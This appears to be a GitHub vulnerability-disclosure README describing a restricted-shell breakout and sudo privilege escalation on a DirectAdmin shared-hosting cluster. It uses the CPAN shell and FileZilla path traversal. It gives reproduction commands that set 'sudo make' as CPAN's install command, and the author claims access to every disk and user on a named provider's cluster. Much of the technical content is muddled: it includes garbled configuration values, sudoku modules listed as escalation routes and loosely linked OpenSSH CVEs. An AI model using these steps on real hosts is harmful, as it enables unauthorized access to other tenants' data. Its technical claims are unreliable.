h4xrOx/Direct-Admin-Vulnerability-Disclosure

Linux Restricted Shell Breakout & privilege escalation on Direct Admin using OpenSSH, CPAN shell and FileZilla.

Linux Restricted Shell Breakout & privilege escalation on Direct Admin using OpenSSH, CPAN shell and FileZilla.

Leveraging CPAN shell to change installation directory:

o conf commit makepl_perl INSTALL_BASE='/home/nelaar/perl' o conf commit mbuildpl_perl --install_base='/home/nelaar/perl' o conf commit

o conf commit makepl_PERL5LIB INSTALL_BASE='/home/nelaar/lib/perl5' o conf commit mbuildpl_PERL5LIB install_base='/home/nelaar/lib/perl5' o conf commit

o conf commit make_install_make_command 'sudo make' o conf commit mbuild_install_build_command 'sudo ./Build' o conf commit

Creating "sudo" shell commands for write/read privledge & nolock CPAN shell:

o conf commit make_install_make_command 'sudo make' o conf commit mbuild_install_build_command 'sudo ./Build' o conf commit

To gain root access by installing modules:

install Data::UUID o conf commit prerequisites_policy follow o conf commit

OutPut:

Module  < App::LDAP::Command::Add::Sudoer (SHELLING/App-LDAP-0.1.2.tar.gz)
Module  < App::LDAP::Command::Del::Sudoer (SHELLING/App-LDAP-0.1.2.tar.gz)
Module  < App::LDAP::Command::Migrate::Sudoer (SHELLING/App-LDAP-0.1.2.tar.gz)
Module  < App::LDAP::LDIF::Sudoer (SHELLING/App-LDAP-0.1.2.tar.gz)
Module  < App::LDAP::ObjectClass::SudoRole (SHELLING/App-LDAP-0.1.2.tar.gz)
Module  < ClearCase::ForceLockSudo (MGI/ClearCase-Wrapper-MGi-1.00.tar.gz)
Module  < Doit::Sudo             (SREZIC/Doit-0.025.tar.gz)
Module  < IPC::ShellCmd::Sudo    (BOBTFISH/IPC-ShellCmd-0.001.tar.gz)
Module  < IPC::ShellCmd::Sudo    (BOBTFISH/IPC-ShellCmd-0.001.tar.gz)
Module  < Image::Leptonica::Func::sudoku (ZMUGHAL/Image-Leptonica-0.04.tar.gz)
Module  < Koha::Contrib::Sudoc   (FREDERICD/Koha-Contrib-Sudoc-2.38.tar.gz)
Module  < Koha::Contrib::Sudoc::BiblioReader (FREDERICD/Koha-Contrib-Sudoc-2.38.tar.gz)
Module  < Koha::Contrib::Sudoc::Converter (FREDERICD/Koha-Contrib-Sudoc-2.38.tar.gz)
Module  < Koha::Contrib::Sudoc::Koha (FREDERICD/Koha-Contrib-Sudoc-2.38.tar.gz)
Module  < Koha::Contrib::Sudoc::Loader (FREDERICD/Koha-Contrib-Sudoc-2.38.tar.gz)
Module  < Koha::Contrib::Sudoc::Loader::Authorities (FREDERICD/Koha-Contrib-Sudoc-2.38.tar.gz)
Module  < Koha::Contrib::Sudoc::Loader::Biblios (FREDERICD/Koha-Contrib-Sudoc-2.38.tar.gz)
Module  < Koha::Contrib::Sudoc::Localisation (FREDERICD/Koha-Contrib-Sudoc-2.38.tar.gz)
Module  < Koha::Contrib::Sudoc::PPNize::Reader (FREDERICD/Koha-Contrib-Sudoc-2.38.tar.gz)
Module  < Koha::Contrib::Sudoc::PPNize::Updater (FREDERICD/Koha-Contrib-Sudoc-2.38.tar.gz)
Module  < Koha::Contrib::Sudoc::Spool (FREDERICD/Koha-Contrib-Sudoc-2.38.tar.gz)
Module  < Koha::Contrib::Sudoc::TransferDaemon (FREDERICD/Koha-Contrib-Sudoc-2.38.tar.gz)
Module  < MYDan::Util::Sudo      (LIJINFENG/MYDan-0.1.62.tar.gz)
Module  < Object::Remote::Connector::LocalSudo (HAARG/Object-Remote-0.004001.tar.gz)
Module  < Orbital::Transfer::Runnable::Sudo (ZMUGHAL/Orbital-Transfer-0.001.tar.gz)
Module  < PasswordMonkey::Filler::Sudo (MSCHILLI/PasswordMonkey-0.09.tar.gz)
Module  < Psh::Builtins::Sudo    (GREGOR/psh-1.8.1.tar.gz)
Module  < Rex::Interface::Exec::Sudo (FERKI/Rex-1.13.4.tar.gz)
Module  < Rex::Interface::File::Sudo (FERKI/Rex-1.13.4.tar.gz)
Module  < Rex::Interface::Fs::Sudo (FERKI/Rex-1.13.4.tar.gz)
Module  < Rex::Sudo::File        (FERKI/Rex-1.13.4.tar.gz)
Module  < Spreadsheet::HTML::Presets::Sudoku (JEFFA/Spreadsheet-HTML-1.20.tar.gz)
Module  < Sudo                   (WAG/Sudo-0.33.tar.gz)
Module  < Text::SuDocs           (CFOUTS/Text-SuDocs-0.014.tar.gz)
Module  < Unix::Sudo             (DCANTRELL/Unix-Sudo-4.567.89.tar.gz)
Module  < Vulcan::Sudo           (KAN/pantheon-0.58.tar.gz)
Module  < eris::log::context::sudo (BLHOTSKY/eris-0.008.tar.gz)
Module  < install                (DAGOLDEN/install-0.01.tar.gz) 

Use FileZilla to unblock hidden files and folders. Search recursively, remotely using dot-dot-slash (../), sequences or absolute path variations to access arbitrary files and directories stored on the server cluster. Also known as Directory Path Transveral to obtain application source code, configuration files and critical information such as system files.

Discovery

#John:

##"Set up a kvm vps, and if  say you want to run your own email start with https://github.com/mailcow/mailcow-dockerized/ and then you can do any other docker containers as well."

#h4xr0x:

##This is along the lines of what I was thinking. Awesome suggestion and thank you for the fast reply during the holidays.

#John:

##"I think there could be issues trying to get da and docker working together."

#h4xr0x:

##I am able to install composer, use symphony and embed dockerized containers set up as  virtual terminals in Nextcloud through the external sites plugin. Using the CPAN shell its possible to configure global configurations and elevate privilege by o conf commit make_install_make_command  'sudo make & o conf commit mbuild_install_build_command 'sudo ./Build' Albeit, even without editing any configuration files,  you can still install modules by accessing the cpan shell by navigating to the root installation directories  and running commands: cpan enters shell.   autobundle lists available modules,  get upgrade ,  install upgrade , Installs modules and o conf  lists  access to user's global configuration.

##I had installed some 20 gb of pearl modules when I went to restore my Nextcloud backup. I observed my backup transfered  2 gb and should have been around 11 mb.  autobundle created a snapshot of the entire server. That's when I realized I had backed up every disk on da600.is.cc. You can view this in screenshot: i.is.cc/17pJm2qN.png | or system logs: In cpan shell you can add to or change any configurations listed. I didn't change any configurations beyond my project's scope. Pentesting was not malicious intention. I came across this honestly trying to see if I could make direct admin work as we discussed.

##I can access the entire cluster, every disk, every user, via SSH & FTP searching directories recursively or by path transversal. CPAN works like a built-in cheat for those who do not have write access. You can see this in my Nextcloud under "settings/ administration/ system"  [ screenshots: i.is.cc/17hhoeTQ.png | i.is.cc/17hrcLC2.png |  i.is.cc/17hBOhsk.png | i.is.cc/17hOmQQE.png ] You may access my NextCloud at #https://gamesense.cloud  for confirmation.

##Additionally there's documentation for many modules that I didn't install, but were added to my $home dir. Some projects document how to "hack" directadmin with perl; you can search "HACKERS" for this document in my local directory. I can run all queries, commands and tests as if I was a root user of the entire cluster. Heres some interesting Dir's [ .cpan | perl5 | /home/admin/ | wwwroot | /home/ | /home/nelaar/ |usr/bin | /usr/directadmin]

Enviorment:[ Webhosting plan without root access or R/W privledges outside of /home/ dir]

` In this set up we have dropped cloudlinux and cpanel. Instead ubuntu 20 is used with bubblewrap (https://github.com/containers/bubblewrap) for sandboxing accounts and preventing access to any other files. This is done for the webserver, which remains litespeed, as well as ssh.

` Kernelcare is kept as with cpanel servers, with the addition of libcare, to patch openssl and glibc updates with out a restart as well as the kernel.

` Imunify360 security remains.

` jetbackup is used as well, but jetbackup5 replacing jetbackup4.

` Softaculous remains for the autoinstaller.

` Clamav remains for email incoming. Spamassassin is replaced with rspamd.

Hacking: what I did, what you can do to reproduce the steps OpenSSH Terminal and type the following commands:

cpan autobundle install upgrade

o conf commit makepl_perl INSTALL_BASE='/home/nelaar/perl' o conf commit mbuildpl_perl --install_base='/home/nelaar/perl' o conf commit

o conf commit makepl_PERL5LIB INSTALL_BASE='/home/nelaar/lib/perl5' o conf commit mbuildpl_PERL5LIB install_base='/home/nelaar/lib/perl5' o conf commit

o conf commit make_install_make_command 'sudo make' o conf commit mbuild_install_build_command 'sudo ./Build' o conf commit

install Data::UUID o conf commit prerequisites_policy follow o conf commit

perl Makefile.PL make make test i /sudo/ make install

i /sudo/ install Data::UUID o conf prerequisites_policy follow o conf commit

Lets take a look at my "NO LOCK CPAN" Configuration file by running:"o conf"

cpan shell -- CPAN exploration and modules installation (v2.22) 
 nolock_cpan[2]> o conf
 $CPAN::Config options from /home/.cpan/CPAN/MyConfig.pm:
    commit             [Commit changes to disk]
    defaults           [Reload defaults from disk]
    help               [Short help about 'o conf' usage]
    init               [Interactive setting of all options]
    applypatch         []
    auto_commit        [0]
    build_cache        [100]
    build_dir          [/home/.cpan/build]
    build_dir_reuse    [0]
    build_requires_install_policy [yes]
    bzip2              [/usr/bin/bzip2]
    cache_metadata     [1]
    check_sigs         [0]
    cleanup_after_install [0]
    colorize_debug     undef
    colorize_output    [0]
    colorize_print     undef
    colorize_warn      undef
    commandnumber_in_prompt [1]
    commands_quote     undef
    connect_to_internet_ok [1]
    cpan_home          [/home/.cpan]
    curl               [/home/]
    dontload_hash      undef
    dontload_list      undef
    ftp                undef
    ftp_passive        [1]
    ftp_proxy          []
    ftpstats_period    undef
    ftpstats_size      undef
    getcwd             [cwd]
    gpg                [/usr/bin/gpg]
    gzip               [/usr/bin/gzip]
    halt_on_failure    [0]
    histfile           [/home/.cpan/histfile]
    histsize           [100]
    http_proxy         []
    inactivity_timeout [0]
    index_expire       [1]
    inhibit_startup_message [0]
    keep_source_where  [/home/.cpan/sources]
    load_module_verbosity [none]
    lynx               undef
    make               [mbuildpl_arg]
    make_arg           []
    make_install_arg   []
    make_install_make_command [sudo make]
    makepl_arg         [INSTALL_BASE=/home/nelaar/perl]
    mbuild_arg         []
    mbuild_install_arg []
    mbuild_install_build_command [sudo ./build]
    mbuildpl_arg       [--installdirs site]
    ncftp              undef
    ncftpget           undef
    no_proxy           []
    pager              [/usr/bin/less]
    password           undef
    patch              [/usr/bin/patch]
    patches_dir        [/home/usr/bin/patch]
    perl5lib_verbosity [none]
    plugin_list       
    prefer_external_tar [1]
    prefer_installer   [MB]
    prefs_dir          [/home/.cpan/prefs]
    prerequisites_policy [follow]
    proxy_pass         undef
    proxy_user         undef
    randomize_urllist  undef
    recommends_policy  [1]
    scan_cache         [atstart]
    shell              [/usr/bin/jailshell]
    show_unparsable_versions [0]
    show_upload_date   [0]
    show_zero_versions [0]
    suggests_policy    [0]
    tar                [/usr/bin/tar]
    tar_verbosity      [none]
    term_is_latin      [1]
    term_ornaments     [1]
    test_report        [0]
    trust_test_report_history [0]
    unzip              [/usr/bin/unzip]
    urllist           
        0 [make]
        1 [ftp://208.73.202.150/]
    use_prompt_default [0]
    use_sqlite         [0]
    username           [sudo]
    version_timeout    [15]
    wait_list          undef
    wget               [/usr/bin/wget]
    yaml_load_code     [make_biuld_YAML]
    yaml_module        [YAML]
nolock_cpan[3]>

Gives me the following options interesting options now that I can use sudo:

i /sudo/ install Data::UUID
Distribution    ABIGAIL/Regexp-Sudoku-2022022401.tar.gz
Distribution    ABIGAIL/Regexp-Sudoku-2022030401.tar.gz
Distribution    BOBO/Games-Sudoku-Lite-0.41.tar.gz
Distribution    CFOUTS/Text-SuDocs-0.014.tar.gz
Distribution    CGUINE/Games-Sudoku-SudokuTk-0.14.tar.gz
Distribution    COPE/Games-Sudoku-OO-0.03.tar.gz
Distribution    DCANTRELL/Unix-Sudo-4.567.89.tar.gz
Distribution    FREDERICD/Koha-Contrib-Sudoc-2.38.tar.gz
Distribution    ISHIGAKI/Games-Sudoku-Component-0.02.tar.gz
Distribution    ISHIGAKI/Games-Sudoku-Component-TkPlayer-0.02.tar.gz
Distribution    MARTYLOO/Games-Sudoku-CPSearch-1.00.tar.gz
Distribution    MEHNER/Games-Sudoku-Solver-1.1.0.tar.gz
Distribution    PERLANCAR/Acme-CPANModules-Sudoku-0.007.tar.gz
Distribution    SZABGAB/Games-Sudoku-CLI-0.02.tar.gz
Distribution    VELASCO/Games-Sudoku-Kubedoku.tar.gz
Distribution    WAG/Sudo-0.33.tar.gz
Distribution    WITTROCK/Games-Sudoku-Preset-v0.1.0.tar.gz
Distribution    WITTROCK/SudokuTrainer-0.01.5.tar.gz
Distribution    WYANT/Games-Sudoku-General-0.027.tar.gz
Distribution    WYLLIE/Games-YASudoku-0.01.tar.gz
Module  < Acme::CPANModules::Sudoku (PERLANCAR/Acme-CPANModules-Sudoku-0.007.tar.gz)
Module  < App::LDAP::Command::Add::Sudoer (SHELLING/App-LDAP-0.1.2.tar.gz)
Module  < App::LDAP::Command::Del::Sudoer (SHELLING/App-LDAP-0.1.2.tar.gz)
Module  < App::LDAP::Command::Migrate::Sudoer (SHELLING/App-LDAP-0.1.2.tar.gz)
Module  < App::LDAP::LDIF::Sudoer (SHELLING/App-LDAP-0.1.2.tar.gz)
Module  < App::LDAP::ObjectClass::SudoRole (SHELLING/App-LDAP-0.1.2.tar.gz)
Module  < ClearCase::ForceLockSudo (MGI/ClearCase-Wrapper-MGi-1.00.tar.gz)
Module  < Data::UUID             (RJBS/Data-UUID-1.226.tar.gz)
Module  < Doit::Sudo             (SREZIC/Doit-0.025.tar.gz)
Module  < Games::Sudoku::CLI     (SZABGAB/Games-Sudoku-CLI-0.02.tar.gz)
Module  < Games::Sudoku::CPSearch (MARTYLOO/Games-Sudoku-CPSearch-1.00.tar.gz)
Module  < Games::Sudoku::Component (ISHIGAKI/Games-Sudoku-Component-0.02.tar.gz)
Module  < Games::Sudoku::Component::Base (ISHIGAKI/Games-Sudoku-Component-0.02.tar.gz)
Module  < Games::Sudoku::Component::Controller (ISHIGAKI/Games-Sudoku-Component-0.02.tar.gz)
Module  < Games::Sudoku::Component::Controller::History (ISHIGAKI/Games-Sudoku-Component-0.02.tar.gz)
Module  < Games::Sudoku::Component::Controller::Loader (ISHIGAKI/Games-Sudoku-Component-0.02.tar.gz)
Module  < Games::Sudoku::Component::Controller::Status (ISHIGAKI/Games-Sudoku-Component-0.02.tar.gz)
Module  < Games::Sudoku::Component::Result (ISHIGAKI/Games-Sudoku-Component-0.02.tar.gz)
Module  < Games::Sudoku::Component::Table (ISHIGAKI/Games-Sudoku-Component-0.02.tar.gz)
Module  < Games::Sudoku::Component::Table::Cell (ISHIGAKI/Games-Sudoku-Component-0.02.tar.gz)
Module  < Games::Sudoku::Component::Table::Item (ISHIGAKI/Games-Sudoku-Component-0.02.tar.gz)
Module  < Games::Sudoku::Component::Table::Permission (ISHIGAKI/Games-Sudoku-Component-0.02.tar.gz)
Module  < Games::Sudoku::Component::TkPlayer (ISHIGAKI/Games-Sudoku-Component-TkPlayer-0.02.tar.gz)
Module  < Games::Sudoku::Component::TkPlayer::Controller (ISHIGAKI/Games-Sudoku-Component-TkPlayer-0.02.tar.gz)
Module  < Games::Sudoku::Component::TkPlayer::Selector (ISHIGAKI/Games-Sudoku-Component-TkPlayer-0.02.tar.gz)
Module  < Games::Sudoku::Component::TkPlayer::Splashscreen (ISHIGAKI/Games-Sudoku-Component-TkPlayer-0.02.tar.gz)
Module  < Games::Sudoku::Component::TkPlayer::View (ISHIGAKI/Games-Sudoku-Component-TkPlayer-0.02.tar.gz)
Module  < Games::Sudoku::General (WYANT/Games-Sudoku-General-0.027.tar.gz)
Module  < Games::Sudoku::Kubedoku (VELASCO/Games-Sudoku-Kubedoku.tar.gz)
Module  < Games::Sudoku::Lite    (BOBO/Games-Sudoku-Lite-0.41.tar.gz)
Module  < Games::Sudoku::OO::Board (COPE/Games-Sudoku-OO-0.03.tar.gz)
Module  < Games::Sudoku::OO::Cell (COPE/Games-Sudoku-OO-0.03.tar.gz)
Module  < Games::Sudoku::OO::Set (COPE/Games-Sudoku-OO-0.03.tar.gz)
Module  < Games::Sudoku::OO::Set::Column (COPE/Games-Sudoku-OO-0.03.tar.gz)
Module  < Games::Sudoku::OO::Set::Row (COPE/Games-Sudoku-OO-0.03.tar.gz)
Module  < Games::Sudoku::OO::Set::Square (COPE/Games-Sudoku-OO-0.03.tar.gz)
Module  < Games::Sudoku::Preset  (WITTROCK/Games-Sudoku-Preset-v0.1.0.tar.gz)
Module  < Games::Sudoku::Solver  (MEHNER/Games-Sudoku-Solver-1.1.0.tar.gz)
Module  < Games::Sudoku::SudokuTk (CGUINE/Games-Sudoku-SudokuTk-0.14.tar.gz)
Module  < Games::Sudoku::Trainer::Cell (WITTROCK/SudokuTrainer-0.01.5.tar.gz)
Module  < Games::Sudoku::Trainer::General_info (WITTROCK/SudokuTrainer-0.01.5.tar.gz)
Module  < Games::Sudoku::Trainer::Nextvalue (WITTROCK/SudokuTrainer-0.01.5.tar.gz)
Module  < Games::Sudoku::Trainer::Obstacle (WITTROCK/SudokuTrainer-0.01.5.tar.gz)
Module  < Games::Sudoku::Trainer::Run (WITTROCK/SudokuTrainer-0.01.5.tar.gz)
Module  < Games::Sudoku::Trainer::Training (WITTROCK/SudokuTrainer-0.01.5.tar.gz)
Module  < Games::YASudoku        (WYLLIE/Games-YASudoku-0.01.tar.gz)
Module  < Games::YASudoku::Board (WYLLIE/Games-YASudoku-0.01.tar.gz)
Module  < Games::YASudoku::Square (WYLLIE/Games-YASudoku-0.01.tar.gz)
Module  < IPC::ShellCmd::Sudo    (BOBTFISH/IPC-ShellCmd-0.001.tar.gz)
Module  < Image::Leptonica::Func::sudoku (ZMUGHAL/Image-Leptonica-0.04.tar.gz)
Module  < Koha::Contrib::Sudoc   (FREDERICD/Koha-Contrib-Sudoc-2.38.tar.gz)
Module  < Koha::Contrib::Sudoc::BiblioReader (FREDERICD/Koha-Contrib-Sudoc-2.38.tar.gz)
Module  < Koha::Contrib::Sudoc::Converter (FREDERICD/Koha-Contrib-Sudoc-2.38.tar.gz)
Module  < Koha::Contrib::Sudoc::Koha (FREDERICD/Koha-Contrib-Sudoc-2.38.tar.gz)
Module  < Koha::Contrib::Sudoc::Loader (FREDERICD/Koha-Contrib-Sudoc-2.38.tar.gz)
Module  < Koha::Contrib::Sudoc::Loader::Authorities (FREDERICD/Koha-Contrib-Sudoc-2.38.tar.gz)
Module  < Koha::Contrib::Sudoc::Loader::Biblios (FREDERICD/Koha-Contrib-Sudoc-2.38.tar.gz)
Module  < Koha::Contrib::Sudoc::Localisation (FREDERICD/Koha-Contrib-Sudoc-2.38.tar.gz)
Module  < Koha::Contrib::Sudoc::PPNize::Reader (FREDERICD/Koha-Contrib-Sudoc-2.38.tar.gz)
Module  < Koha::Contrib::Sudoc::PPNize::Updater (FREDERICD/Koha-Contrib-Sudoc-2.38.tar.gz)
Module  < Koha::Contrib::Sudoc::Spool (FREDERICD/Koha-Contrib-Sudoc-2.38.tar.gz)
Module  < Koha::Contrib::Sudoc::TransferDaemon (FREDERICD/Koha-Contrib-Sudoc-2.38.tar.gz)
Module  < MYDan::Util::Sudo      (LIJINFENG/MYDan-0.1.62.tar.gz)
Module  < Object::Remote::Connector::LocalSudo (HAARG/Object-Remote-0.004001.tar.gz)
Module  < Orbital::Transfer::Runnable::Sudo (ZMUGHAL/Orbital-Transfer-0.001.tar.gz)
Module  < PasswordMonkey::Filler::Sudo (MSCHILLI/PasswordMonkey-0.09.tar.gz)
Module  < Psh::Builtins::Sudo    (GREGOR/psh-1.8.1.tar.gz)
Module  < Regexp::Sudoku         (ABIGAIL/Regexp-Sudoku-2022030401.tar.gz)
Module  < Regexp::Sudoku::Constants (ABIGAIL/Regexp-Sudoku-2022022401.tar.gz)
Module  < Rex::Interface::Exec::Sudo (FERKI/Rex-1.13.4.tar.gz)
Module  < Rex::Interface::File::Sudo (FERKI/Rex-1.13.4.tar.gz)
Module  < Rex::Interface::Fs::Sudo (FERKI/Rex-1.13.4.tar.gz)
Module  < Rex::Sudo::File        (FERKI/Rex-1.13.4.tar.gz)
Module  < Spreadsheet::HTML::Presets::Sudoku (JEFFA/Spreadsheet-HTML-1.20.tar.gz)
Module  < Sudo                   (WAG/Sudo-0.33.tar.gz)
Module  < Text::SuDocs           (CFOUTS/Text-SuDocs-0.014.tar.gz)
Module  < Unix::Sudo             (DCANTRELL/Unix-Sudo-4.567.89.tar.gz)
Module  < Vulcan::Sudo           (KAN/pantheon-0.58.tar.gz)
Module  < eris::log::context::sudo (BLHOTSKY/eris-0.008.tar.gz)
Module  < install                (DAGOLDEN/install-0.01.tar.gz)
Author          YISUDONG ("YisuDong" <YisuDong@gmail.com>)
101 items found

I checked and  could install the following; of which, a non-root user like myself should not have access to outside their /home/dir.  adding sudo command elevate my privileges; the following had I installed - would escalate that:

Module  < App::LDAP::Command::Add::Sudoer (SHELLING/App-LDAP-0.1.2.tar.gz)
Module  < App::LDAP::Command::Del::Sudoer (SHELLING/App-LDAP-0.1.2.tar.gz)
Module  < App::LDAP::Command::Migrate::Sudoer (SHELLING/App-LDAP-0.1.2.tar.gz)
Module  < App::LDAP::LDIF::Sudoer (SHELLING/App-LDAP-0.1.2.tar.gz)
Module  < App::LDAP::ObjectClass::SudoRole (SHELLING/App-LDAP-0.1.2.tar.gz)
Module  < ClearCase::ForceLockSudo (MGI/ClearCase-Wrapper-MGi-1.00.tar.gz)
Module  < Doit::Sudo             (SREZIC/Doit-0.025.tar.gz)
Module  < IPC::ShellCmd::Sudo    (BOBTFISH/IPC-ShellCmd-0.001.tar.gz)
Module  < IPC::ShellCmd::Sudo    (BOBTFISH/IPC-ShellCmd-0.001.tar.gz)
Module  < Image::Leptonica::Func::sudoku (ZMUGHAL/Image-Leptonica-0.04.tar.gz)
Module  < Koha::Contrib::Sudoc   (FREDERICD/Koha-Contrib-Sudoc-2.38.tar.gz)
Module  < Koha::Contrib::Sudoc::BiblioReader (FREDERICD/Koha-Contrib-Sudoc-2.38.tar.gz)
Module  < Koha::Contrib::Sudoc::Converter (FREDERICD/Koha-Contrib-Sudoc-2.38.tar.gz)
Module  < Koha::Contrib::Sudoc::Koha (FREDERICD/Koha-Contrib-Sudoc-2.38.tar.gz)
Module  < Koha::Contrib::Sudoc::Loader (FREDERICD/Koha-Contrib-Sudoc-2.38.tar.gz)
Module  < Koha::Contrib::Sudoc::Loader::Authorities (FREDERICD/Koha-Contrib-Sudoc-2.38.tar.gz)
Module  < Koha::Contrib::Sudoc::Loader::Biblios (FREDERICD/Koha-Contrib-Sudoc-2.38.tar.gz)
Module  < Koha::Contrib::Sudoc::Localisation (FREDERICD/Koha-Contrib-Sudoc-2.38.tar.gz)
Module  < Koha::Contrib::Sudoc::PPNize::Reader (FREDERICD/Koha-Contrib-Sudoc-2.38.tar.gz)
Module  < Koha::Contrib::Sudoc::PPNize::Updater (FREDERICD/Koha-Contrib-Sudoc-2.38.tar.gz)
Module  < Koha::Contrib::Sudoc::Spool (FREDERICD/Koha-Contrib-Sudoc-2.38.tar.gz)
Module  < Koha::Contrib::Sudoc::TransferDaemon (FREDERICD/Koha-Contrib-Sudoc-2.38.tar.gz)
Module  < MYDan::Util::Sudo      (LIJINFENG/MYDan-0.1.62.tar.gz)
Module  < Object::Remote::Connector::LocalSudo (HAARG/Object-Remote-0.004001.tar.gz)
Module  < Orbital::Transfer::Runnable::Sudo (ZMUGHAL/Orbital-Transfer-0.001.tar.gz)
Module  < PasswordMonkey::Filler::Sudo (MSCHILLI/PasswordMonkey-0.09.tar.gz)
Module  < Psh::Builtins::Sudo    (GREGOR/psh-1.8.1.tar.gz)
Module  < Rex::Interface::Exec::Sudo (FERKI/Rex-1.13.4.tar.gz)
Module  < Rex::Interface::File::Sudo (FERKI/Rex-1.13.4.tar.gz)
Module  < Rex::Interface::Fs::Sudo (FERKI/Rex-1.13.4.tar.gz)
Module  < Rex::Sudo::File        (FERKI/Rex-1.13.4.tar.gz)
Module  < Spreadsheet::HTML::Presets::Sudoku (JEFFA/Spreadsheet-HTML-1.20.tar.gz)
Module  < Sudo                   (WAG/Sudo-0.33.tar.gz)
Module  < Text::SuDocs           (CFOUTS/Text-SuDocs-0.014.tar.gz)
Module  < Unix::Sudo             (DCANTRELL/Unix-Sudo-4.567.89.tar.gz)
Module  < Vulcan::Sudo           (KAN/pantheon-0.58.tar.gz)
Module  < eris::log::context::sudo (BLHOTSKY/eris-0.008.tar.gz)
Module  < install                (DAGOLDEN/install-0.01.tar.gz)

Conclusion:

I didn't install or go beyond scope of my development needs. I am sure that with permission to, I would find and could document known and unknown CVE's on "edited for privacy" . I am sure that you are already aware of this, there might even be great reasons for it. I must ask, If you will answer the following questions I would appreciate very much:

Network: "edited for privacy" Hostname: "edited for privacy" DNS:  "edited for privacy" Gateway:  "edited for privacy" #Impact

Possible CVE's to define Cause and Effect:

CVE-2019-6111 An issue was discovered in OpenSSH 7.9. Due to the scp implementation being derived from 1983 rcp, the server chooses which files/directories are sent to the client. However, the scp client only performs cursory validation of the object name returned (only directory traversal attacks are prevented). A malicious scp server (or Man-in-The-Middle attacker) can overwrite arbitrary files in the scp client target directory. If recursive operation (-r) is performed, the server can manipulate subdirectories as well (for example, to overwrite the .ssh/authorized_keys file).

CVE-2019-6110 In OpenSSH 7.9, due to accepting and displaying arbitrary stderr output from the server, a malicious server (or Man-in-The-Middle attacker) can manipulate the client output, for example to use ANSI control codes to hide additional files being transferred.

CVE-2018-20685 In OpenSSH 7.9, scp.c in the scp client allows remote SSH servers to bypass intended access restrictions via the filename of . or an empty filename. The impact is modifying the permissions of the target directory on the client side.

CVE-2019-6109 An issue was discovered in OpenSSH 7.9. Due to missing character encoding in the progress display, a malicious server (or Man-in-The-Middle attacker) can employ crafted object names to manipulate the client output, e.g., by using ANSI control codes to hide additional files being transferred. This affects refresh_progress_meter() in progressmeter.c.

Reference: 

https://www.shodan.io/domain/is.cc

https://gamesense.cloud

https://my.interserver.net

https://directadmin.com

https://perl.developpez.com/documentations/en/5.20.0/

https://nextcloud.com/

https://www.openssh.com/

https://filezilla-project.org/

Reflection:

Without actually using tools foreign to my.interserver.net I stumbled upon some severe vulnerability issues. I did this with filezilla and the SSH terminal preinstalled on "edited for privacy" directly from my browser using  "edited for privacy"  I used no API's or external services. I believe without doubt that if I were to pentest this using the full arsenal of custom tools I have made for my tool kit that I would escalate these security issues. That said; even using public tools from lets say, kali linux distro --- I am sure my findings would be much more detailed, alarming and CVE specific. What I found is likely due to there being a few to many security commits behind the main branch. I believe it could be solved with updates and removing a few commented(#) options in the .conf files.